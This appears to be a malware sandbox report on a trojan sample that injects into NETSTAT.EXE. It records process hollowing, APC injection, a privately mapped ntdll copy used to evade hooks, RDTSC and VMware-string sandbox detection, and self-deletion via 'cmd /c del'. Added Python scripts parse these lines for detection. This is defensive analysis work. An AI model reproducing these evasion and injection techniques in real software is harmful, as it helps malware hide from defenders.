Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ADB040 NtSuspendThread,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9A10 NtQuerySection,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ADA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ADAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD9560 NtWriteFile,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD96D0 NtCreateKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032599A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032596D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032595D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0325A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259A20 NtResumeThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259A10 NtQuerySection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032599D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0325B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032598A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032598F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0325A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259760 NtOpenProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0325A770 NtOpenThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032597A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0325AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_03259560 NtWriteFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_032595F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_007785F0 NtCreateFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_007786A0 NtReadFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_00778720 NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_007787D0 NtAllocateVirtualMemory,
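Two things in the Nt* list above are worth pulling out mechanically rather than by eye. First, each process resolves the full hollowing chain (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) plus NtQueueApcThread, which is what the "process hollowing" and "queues an APC" signatures key on. Second, several APIs appear twice at widely separated addresses (NtReadFile at 1_2_004186A0 and again at 1_2_00AD9540; NtClose at 9_2_00778720 and 9_2_032595D0): the second set lives in the same region where the report later finds the wntdll.pdb string in RWX memory, i.e. a privately mapped copy of ntdll whose stubs are not covered by user-mode hooks. The script below is an added example, not part of the Joe Sandbox report: it parses lines in the report's own "Code function" format (glued or spaced), groups the stubs per process, and scores both patterns. The API chain sets and the 1 MiB address-bucket heuristic for "two stub sets" are my assumptions; the process 12 line is a constructed benign control.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "Code function" lines from the report above
# (process 1 is the re-launched sample, process 9 the injected NETSTAT.EXE).
# The last line (process 12) is a constructed control that is NOT in the report.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004186A0 NtReadFile,
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ADAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032599D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032597A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032598A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0325AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03259A20 NtResumeThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00778720 NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032595D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\System32\cmd.exeCode function: 12_2_00401000 NtClose,
"""

# Accepts both "exeCode function:" (as extracted) and "exe Code function:".
LINE_RE = re.compile(
    r"Source: (?P<image>.*?\.(?:exe|dll))\s*Code function: "
    r"(?P<pid>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]{8}) (?P<apis>[A-Za-z0-9_,]*)",
    re.IGNORECASE,
)

# Assumed technique definitions (my choice, not the sandbox's rule set).
HOLLOWING = {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtWriteVirtualMemory",
             "NtSetContextThread", "NtResumeThread"}
APC_INJECTION = {"NtWriteVirtualMemory", "NtQueueApcThread"}


def parse(text):
    """Return {pid: {"image": path, "stubs": {NtApi: {addresses}}}}."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        proc = procs.setdefault(m["pid"], {"image": m["image"], "stubs": defaultdict(set)})
        for api in filter(None, m["apis"].split(",")):
            if api.startswith("Nt"):            # ignore LdrInitializeThunk etc.
                proc["stubs"][api].add(int(m["addr"], 16))
    return procs


def assess(procs):
    """Return {pid: (image, [finding, ...])} in a fixed order."""
    findings = {}
    for pid, proc in procs.items():
        apis = set(proc["stubs"])
        hits = []
        if HOLLOWING <= apis:
            hits.append("process-hollowing")
        if APC_INJECTION <= apis:
            hits.append("apc-injection")
        # The same syscall stub resolved in two different 1 MiB buckets means two
        # copies of the stub exist: consistent with a second, privately mapped ntdll
        # used to sidestep user-mode API hooks (heuristic; bucket size is assumed).
        dual = sorted(api for api, addrs in proc["stubs"].items()
                      if len({a >> 20 for a in addrs}) > 1)
        if dual:
            hits.append("dual-ntdll-stubs:" + ",".join(dual))
        findings[pid] = (proc["image"], hits)
    return findings


if __name__ == "__main__":
    for pid, (image, hits) in assess(parse(SAMPLE_LINES)).items():
        print(f"pid {pid:>3} {image}: {hits or 'no findings'}")
```

Run against the full list in the report, both process 1 and process 9 score all three findings; a process that only ever resolves one copy of a few benign Nt* functions scores nothing.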
Source: TT COPY_02101011.exe, 00000000.00000003.679935537.0000000002B86000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
Source: TT COPY_02101011.exe, 00000000.00000003.679172952.0000000002D1F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
Source: TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
Source: TT COPY_02101011.exe, 00000001.00000002.748099738.0000000000D1F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
Source: TT COPY_02101011.exe Virustotal: Detection: 36%
Source: TT COPY_02101011.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\TT COPY_02101011.exe File read: C:\Users\user\Desktop\TT COPY_02101011.exe
Source: TT COPY_02101011.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\TT COPY_02101011.exe File created: C:\Users\user\AppData\Local\Temp\nsxA74D.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/2@13/8
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_100116A5 push ecx; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_0041C060 push edx; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_0041B832 push eax; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_0041B83B push eax; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_0041B89C push eax; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_004153BE pushfd ; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_0041551B push ecx; iretd
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_0041B7E5 push eax; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AED0D1 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0326D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0077C060 push edx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0077B832 push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0077B83B push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0077B89C push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_007753BE pushfd ; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0077551B push ecx; iretd
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 9_2_0077B7E5 push eax; ret
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe File created: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll

          Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
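The detail that matters for detection in the process tree above is that the `cmd.exe /c del` is not a child of the sample at all: it descends from explorer.exe via NETSTAT.EXE, because the deleting code is running inside a system utility that the injected explorer.exe launched (the report's "injects a PE file into a foreign process" and "system process connects to network" signatures). A rule that only looks for a process deleting its own image, or a direct child deleting its parent, misses this. The script below is an added example and not part of the Joe Sandbox report: it parses the report's "Process created" lines, links processes by image path (the report lines carry no PIDs, so that linkage is an assumption), and flags a `del` whose target is the image of any process in the trace, recording whether that process is in the deleting cmd.exe's lineage. It also flags explorer.exe launching a Windows system binary with a bare command line, which is my own heuristic for the injected-host pattern seen here, not a rule from the report. The `dropper.exe` case is a constructed control.

```python
import re

# Constructed input: the "Process created" lines from the report above, one copy each.
REPORT_TREE = r"""
Source: unknownProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""

# Constructed control (not from the report): a dropper that deletes itself directly.
DIRECT_TREE = r"""
Source: unknownProcess created: C:\Users\user\Desktop\dropper.exe "C:\Users\user\Desktop\dropper.exe"
Source: C:\Users\user\Desktop\dropper.exeProcess created: C:\Windows\System32\cmd.exe /c del "C:\Users\user\Desktop\dropper.exe"
"""

PROC_RE = re.compile(
    r"Source: (?P<parent>unknown|.*?\.exe)\s*Process created: "
    r"(?P<image>.*?\.exe)(?: (?P<cmdline>.*))?$",
    re.IGNORECASE,
)
DEL_RE = re.compile(r'/c\s+del\s+"?(?P<target>[^"]+?)"?\s*$', re.IGNORECASE)


def build_tree(text):
    """One dict per created process: parent image, own image, command line."""
    nodes = []
    for line in text.splitlines():
        m = PROC_RE.search(line)
        if m:
            nodes.append({"parent": m["parent"], "image": m["image"],
                          "cmdline": m["cmdline"] or ""})
    return nodes


def ancestors(nodes, node):
    """Lower-cased image paths of every ancestor, linked by image path (assumed: no PIDs)."""
    seen, cur = set(), node["parent"]
    while cur and cur.lower() != "unknown" and cur.lower() not in seen:
        seen.add(cur.lower())
        parents = [n for n in nodes if n["image"].lower() == cur.lower()]
        cur = parents[0]["parent"] if parents else None
    return seen


def find_self_deletion(nodes):
    """cmd.exe /c del whose target is the image of some process in the trace."""
    images = {n["image"].lower() for n in nodes}
    findings = []
    for n in nodes:
        if not n["image"].lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(n["cmdline"])
        if m and m["target"].lower() in images:
            findings.append({"target": m["target"], "via": n["parent"],
                             # False means the deleted binary is not an ancestor of the
                             # deleting cmd.exe: the deletion was issued from another host.
                             "in_lineage": m["target"].lower() in ancestors(nodes, n)})
    return findings


def explorer_spawned_utilities(nodes):
    """Heuristic (mine): explorer.exe starting a Windows binary with no arguments."""
    out = []
    for n in nodes:
        bare = n["cmdline"].strip().strip('"').lower() == n["image"].lower()
        if n["parent"].lower().endswith("\\explorer.exe") and \
                n["image"].lower().startswith("c:\\windows\\") and bare:
            out.append(n["image"])
    return out


if __name__ == "__main__":
    tree = build_tree(REPORT_TREE)
    print(find_self_deletion(tree))
    print(explorer_spawned_utilities(tree))
```

On the report's tree this yields one deletion of the original sample issued via NETSTAT.EXE with `in_lineage` false, and two explorer-spawned utilities (autoconv.exe and NETSTAT.EXE); on the control tree the same rule fires with `in_lineage` true. The two results should be weighted differently in a detection pipeline: the out-of-lineage case is the stronger signal, since a benign installer cleaning up after itself does not need a third process to do it.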

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\TT COPY_02101011.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TT COPY_02101011.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000768614 second address: 000000000076861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000007689AE second address: 00000000007689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 6084 Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6328 Thread sleep time: -44000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_004088E0 rdtsc
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_00402630 FindFirstFileA,
Source: explorer.exe, 00000004.00000000.713532059.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.725756968.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.713532059.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.684710887.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_10013220 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_10013220 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_004088E0 rdtsc
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
